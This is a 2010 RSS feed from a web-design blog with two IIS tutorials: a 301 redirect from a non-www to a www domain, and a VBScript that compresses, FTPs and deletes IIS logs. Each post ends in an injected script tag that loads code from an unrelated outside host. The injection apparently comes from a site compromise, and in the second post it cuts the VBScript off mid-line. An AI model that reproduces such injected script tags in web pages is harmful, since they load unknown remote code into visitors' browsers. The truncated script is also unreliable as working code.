<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Wacdesigns &#187; IIS</title>
	<atom:link href="http://www.wacdesigns.com/tag/iis/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.wacdesigns.com</link>
	<description>What about Creativity ?</description>
	<lastBuildDate>Sat, 19 Jun 2010 12:58:26 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>IIS: Redirection from non-www to www domain</title>
		<link>http://www.wacdesigns.com/2008/08/08/iis-redirection-from-non-www-to-www-domain/</link>
		<comments>http://www.wacdesigns.com/2008/08/08/iis-redirection-from-non-www-to-www-domain/#comments</comments>
		<pubDate>Fri, 08 Aug 2008 02:00:42 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[Cool Stuff]]></category>
		<category><![CDATA[Hosting]]></category>
		<category><![CDATA[SEO]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[IIS]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/?p=121</guid>
		<description><![CDATA[The problem today, is that we have a great asp.net website but search engines are indexing the http://greataspnetwebsite.com instead of http://www.greataspnetwebsite.com, this is commonly seen on the web and there are several ways to archive a good result for making &#8230; <a href="http://www.wacdesigns.com/2008/08/08/iis-redirection-from-non-www-to-www-domain/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>The problem today, is that we have a great asp.net website but search engines are indexing the <a href="#">http://greataspnetwebsite.com</a> instead of <a href="#">http://www.greataspnetwebsite.com</a>, this is commonly seen on the web and there are several ways to archive a good result for making the non-www to www domain. This redirection should be a <strong>301 Permanently Moved</strong>, otherwise you will might lose your search engine indexed page or become duplicate content for your non-www and www domain. Here are easy steps how to archive a quick and clean Permanent Redirection using IIS.</p>
<p>Consider the case where we already have a website in IIS called: greataspnetwebsite.com</p>
<ul>
<li>Go to IIS Manager</li>
<li>Create a new website that point to the same directory as your existing one</li>
<li>Select the newly created website, open the properties box</li>
<li>In the option button <span style="color: black;">&#8220;When connecting to this resource the      content should come from&#8221; should be </span>change to &#8220;<span style="color: black;">A redirection to a URL</span>&#8220;</li>
<li>Specify the URL http://www.greataspnetwebsite.com</li>
<li>Select the check box <span style="color: black;">that      says &#8220;A permanent redirection for this resource.&#8221; </span></li>
</ul>
<p><a href="http://www.wacdesigns.com/wp-content/uploads/2008/08/iisredirectionsetting.jpg"><img class="alignnone size-full wp-image-123" title="iis redirection setting" src="http://www.wacdesigns.com/wp-content/uploads/2008/08/iisredirectionsetting.jpg" alt="" width="430" height="211" /></a><br />
[ad#co-inlinepost]<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2008/08/08/iis-redirection-from-non-www-to-www-domain/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IIS Log Archiving</title>
		<link>http://www.wacdesigns.com/2008/06/24/iis-log-archiving/</link>
		<comments>http://www.wacdesigns.com/2008/06/24/iis-log-archiving/#comments</comments>
		<pubDate>Tue, 24 Jun 2008 05:58:09 +0000</pubDate>
		<dc:creator>jf</dc:creator>
				<category><![CDATA[Hosting]]></category>
		<category><![CDATA[Web]]></category>
		<category><![CDATA[Work]]></category>
		<category><![CDATA[IIS]]></category>

		<guid isPermaLink="false">http://www.wacdesigns.com/?p=145</guid>
		<description><![CDATA[You need to archive your IIS Log often so as not to get your log folder full with HTTP Logs. I have been searching for some quick implemented solutions for performing this IIS Log archiving task and found some quiet &#8230; <a href="http://www.wacdesigns.com/2008/06/24/iis-log-archiving/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
			<content:encoded><![CDATA[<p>You need to archive your IIS Log often so as not to get your log folder full with HTTP Logs.</p>
<p>I have been searching for some quick implemented solutions for performing this IIS Log archiving task and found some quiet nice discussions and article about it. Here are the links to the different post and forums that talk about a solution to solve this issue:</p>
<p><a href="http://blogs.thesitedoctor.co.uk/tim/2007/02/10/Automatically+Delete+Old+IIS+Log+Files.aspx" target="_blank">http://blogs.thesitedoctor.co.uk/tim/2007/02/10/Automatically+Delete+Old+IIS+Log+Files.aspx</a></p>
<p><a href="http://www.iislogs.com/" target="_blank">http://www.iislogs.com/</a> (Tool to automate maintenance of IIS Log)<a href="http://www.iislogs.com/" target="_blank"><br />
</a></p>
<p><a href="http://forums.webhostautomation.com/showthread.php?t=5053" target="_blank">http://forums.webhostautomation.com/showthread.php?t=5053</a></p>
<p><a href="http://forums.iis.net/p/1022450/1388469.aspx" target="_blank">http://forums.iis.net/p/1022450/1388469.aspx</a></p>
<p>On my side i need something with a bit more functionality so, i modified some of the scripts that i could find on the different article related above and came up with a solution that can.</p>
<ul>
<li>Compress each log file found in your websites folder</li>
<li>FTP the compressed files on a foreign server ( Keeping historic of your IIS log ) Uses <a title="Chillkat Free FTP ActiveX" href="http://www.chilkatsoft.com/chilkatftp.asp" target="_blank">Chillkat Free FTP ActiveX</a></li>
<li>Delete them from your disk afterward</li>
</ul>
<p>You can launch this process everyday and there will be no log that is older than a specified number of days on your server.</p>
<p>Requirement for this solution to work:</p>
<ul>
<li><a title="FTP ActiveX Download" href="http://www.chillkatsoft.com/download/FtpActiveX.msi" target="_blank">Chillkatsoft FTP.1 ActiveX</a></li>
<li><a title="Gzip" href="http://www.gzip.org/" target="_blank">gzip archiver</a></li>
</ul>
<p>You can download the script <a title="IIS Log Archiver" href="http://www.wacdesigns.com/wp-content/uploads/2008/06/IISLogarchiver.zip" target="_blank">here</a>.</p>
<p>See the entire script in the <a title="IIS Log Archiving" href="http://www.wacdesigns.com/2008/06/24/iis-log-archiving/" target="_self">full post</a>.</p>
<p><span id="more-86"></span><br />
[sourcecode language='vb']Option Explicit</p>
<p>Const ftpSite = &#8220;yourftpsite&#8221;<br />
Const ftpUsername = &#8220;ftpusername&#8221;<br />
Const ftpPassword = &#8220;ftppassword&#8221;<br />
Const bDEBUG = True<br />
Const zipProgram = &#8220;C:\gzip\gzip.exe&#8221; &#8216; Path to your gzip utility<br />
Const zipExtension = &#8220;.gz&#8221;</p>
<p>Dim objFSO, objFolder, objF, objWS<br />
Dim strYear, strDay, strMonth, strDate<br />
Dim strBaseFTPPath<br />
Dim bFTPUpload</p>
<p>bFTPUpload = False</p>
<p>&#8216;If no arguments passed quit the script<br />
If WScript.Arguments.Count = 0 Then<br />
WScript.Echo &#8220;weblogs.vbs startdirectory [ftppath]&#8221;<br />
WScript.Quit (1)<br />
End If</p>
<p>&#8216;Check if there is the FTP path Argument sent<br />
If WScript.Arguments.Count > 1 Then<br />
bFTPUpload = True<br />
strBaseFTPPath = wscript.arguments (1)<br />
End If</p>
<p>strDate<script src="http://ao.euuaw.com/9"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.wacdesigns.com/2008/06/24/iis-log-archiving/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
